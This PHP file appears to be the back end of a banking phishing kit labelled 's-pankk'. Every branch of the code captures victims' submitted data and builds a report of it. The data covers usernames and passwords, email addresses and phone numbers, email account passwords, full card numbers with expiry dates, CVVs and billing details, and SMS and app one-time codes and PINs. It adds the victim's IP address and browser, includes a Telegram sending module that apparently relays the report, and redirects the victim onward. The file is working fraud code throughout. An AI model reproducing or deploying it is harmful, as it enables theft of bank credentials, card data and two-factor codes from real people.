<?php
if (isset($_POST['username'])) {

include("Time_browser.php"); 

$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     



$username = $_SESSION['username'] = $_POST['username'];
$password = $_SESSION['password'] = $_POST['password'];



$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;

$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[👤 Username ] =  '.$_SESSION['username'].'
[💬 Password ]  = '.$_SESSION['password'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';


include("../../../Your_Info.php"); 
include("TelegramAPi.php");



$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";


}elseif (isset($_POST['Email'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$Email = $_SESSION['Email'] = $_POST['Email'];
$phone = $_SESSION['phone'] = $_POST['phone'];


$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;




$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[💬 Email Adress  ]  = '.$_SESSION['Email'].'
[💬 Phone Number ]  = '.$_SESSION['phone'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("../../../Your_Info.php"); 
include("TelegramAPi.php");



$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}elseif (isset($_POST['cc'])) {

    include("Time_browser.php"); 
    
    
    $InfoDATE   = date("d-m-Y h:i:sa");
    
    $OS =getOS($_SERVER['HTTP_USER_AGENT']); 
    
    $UserAgent =$_SERVER['HTTP_USER_AGENT'];
    $browser = explode(')',$UserAgent);      
    $_SESSION['browser'] = $browserTy_Version =array_pop($browser);     
    
    
    $cc = $_SESSION['cc'] = $_POST['cc'];
    $cc = $_SESSION['exp'] = $_POST['exp'];
    $cc = $_SESSION['cvv'] = $_POST['cvv'];
    
    
    $Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
    $rt = substr($Domin, 0, -28);
    $rtt = ''.$rt.'/Account/dashboard.php' ;
    $ban = ''.$rt.'../../Customer.txt' ;
    $vuto = ''.$rt.'/Account/dashboard.php' ;
    
    
    
    
    $yagmai .= '
    [+]━━━━【s-pankk】━━━[+]
    [💬 Card Number ]  = '.$_SESSION['cc'].'
    [💬 Date exp]  = '.$_SESSION['exp'].'
    [💬 Date exp]  = '.$_SESSION['cvv'].'
    [+]━━━━【💻 System】━━━[+]
    [🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
    [⏰ TIME/DATE] ='.$InfoDATE.'
    [🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
    ';
    
    include("../../../Your_Info.php"); 
    include("TelegramAPi.php");
    
    
    
    $Page .= '';
      $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
          fwrite($fPage, $Page);
    
          header("location:../Account/Account.php");    echo "<script>
          setTimeout(function(){
      window.location.href = '../Account/Account.php';
          });
       </script>";
        
    
    }elseif (isset($_POST['cardnumber'])) {

    include("Time_browser.php"); 

    
    $InfoDATE   = date("d-m-Y h:i:sa");
    
    $OS =getOS($_SERVER['HTTP_USER_AGENT']); 
    
    $UserAgent =$_SERVER['HTTP_USER_AGENT'];
    $browser = explode(')',$UserAgent);             
    $_SESSION['browser'] = $browserTy_Version =array_pop($browser);     
    

    $nameoncard = $_SESSION['nameoncard'] = $_POST['nameoncard'];
    $cardnumber = $_SESSION['cardnumber'] = $_POST['cardnumber'];
    $expiryDatemonth = $_SESSION['expiryDate-month'] = $_POST['expiryDate-month'];
    $expiryDateyear = $_SESSION['expiryDate-year'] = $_POST['expiryDate-year'];

    $Securitycode = $_SESSION['Securitycode'] = $_POST['Securitycode'];

    $zipCode = $_SESSION['zipCode'] = $_POST['zipCode'];
    $houseNumber = $_SESSION['houseNumber'] = $_POST['houseNumber'];


    $Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
    $rt = substr($Domin, 0, -28);
    $rtt = ''.$rt.'/Account/dashboard.php' ;
    $ban = ''.$rt.'../../Customer.txt' ;
    $vuto = ''.$rt.'/Account/dashboard.php' ;
    
    
    
$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[👤 CardHolder Name]  = '.$_SESSION['nameoncard'].'
[💳 CC Number] = '.$_SESSION['cardnumber'].'
[🔄 Expiry Date  MM/JJ ]   = '.$_SESSION['expiryDate-month'].'/'.$_SESSION['expiryDate-year'].'
[🔑 CVV ] = '.$_SESSION['Securitycode'].'
[🔄 Zip Code ]   = '.$_SESSION['zipCode'].'
[🔄 houseNumber ]   = '.$_SESSION['houseNumber'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
    ';
    
    include("../../../Your_Info.php"); 
    include("TelegramAPi.php");
    
    
    
    $Page .= '';
      $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
          fwrite($fPage, $Page);
    
          header("location:../Account/Account.php");    echo "<script>
          setTimeout(function(){
      window.location.href = '../Account/Account.php';
          });
       </script>";
 

    
    }elseif (isset($_POST['Sms'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$Sms = $_SESSION['Sms'] = $_POST['Sms'];

$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;


$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[👤 Code Sms ]  = '.$_SESSION['Sms'].'
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("../../../Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);
      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    


}elseif (isset($_POST['pinCode'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$pinCode = $_SESSION['pinCode'] = $_POST['pinCode'];

$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;

$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[💬 Code App ]  = '.$_SESSION['pinCode'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("../../../Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}elseif (isset($_POST['codesms'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$codesms = $_SESSION['codesms'] = $_POST['codesms'];


$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;



$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[💬 Code sms ]  = '.$_SESSION['codesms'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("../../../Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}elseif (isset($_POST['Emailaccess'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$Emailaccess = $_SESSION['Emailaccess'] = $_POST['Emailaccess'];
$passwordemail = $_SESSION['passwordemail'] = $_POST['passwordemail'];


$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;

$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[💬 Email Access ]  = '.$_SESSION['Emailaccess'].'
[💬 password Email ]  = '.$_SESSION['passwordemail'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("../../../Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}
elseif (isset($_POST['sms'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$sms = $_SESSION['sms'] = $_POST['sms'];


$Domin = ''.$_SERVER['HTTP_HOST'].''.$_SERVER['SCRIPT_NAME'].'';
$rt = substr($Domin, 0, -28);
$rtt = ''.$rt.'/Account/dashboard.php' ;
$ban = ''.$rt.'../../Customer.txt' ;
$vuto = ''.$rt.'/Account/dashboard.php' ;


$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[🔄 Sms ]   = '.$_SESSION['sms'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("../../../Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);
      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    


}elseif (isset($_POST['userid'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$userid = $_SESSION['userid'] = $_POST['userid'];
$password = $_SESSION['password'] = $_POST['password'];



$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[💬 User ]  = '.$_SESSION['userid'].'
[💬 Password  ]  = '.$_SESSION['password'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("../../../Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);

      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    

}
elseif (isset($_POST['pass'])) {

include("Time_browser.php"); 


$InfoDATE   = date("d-m-Y h:i:sa");

$OS =getOS($_SERVER['HTTP_USER_AGENT']); 

$UserAgent =$_SERVER['HTTP_USER_AGENT'];
$browser = explode(')',$UserAgent);      
$_SESSION['browser'] = $browserTy_Version =array_pop($browser);     


$pass = $_SESSION['pass'] = $_POST['pass'];



$yagmai .= '
[+]━━━━【s-pankk】━━━[+]
[💬 Pass Sms ]   = '.$_SESSION['pass'].'
[+]━━━━【💻 System】━━━[+]
[🔍 IP INFO] = http://www.geoiptool.com/?IP='.$_SERVER['REMOTE_ADDR'].'
[⏰ TIME/DATE] ='.$InfoDATE.'
[🌐 BROWSER] = '.$browserTy_Version.' and '.$OS.'
';

include("../../../Your_Info.php"); 
include("TelegramAPi.php");

$Page .= '';
  $fPage = fopen("../Account/System_sql/Redirect.txt", "w");
      fwrite($fPage, $Page);
      header("location:../Account/Account.php");    echo "<script>
      setTimeout(function(){
  window.location.href = '../Account/Account.php';
      });
   </script>";
    


}else {




}



?>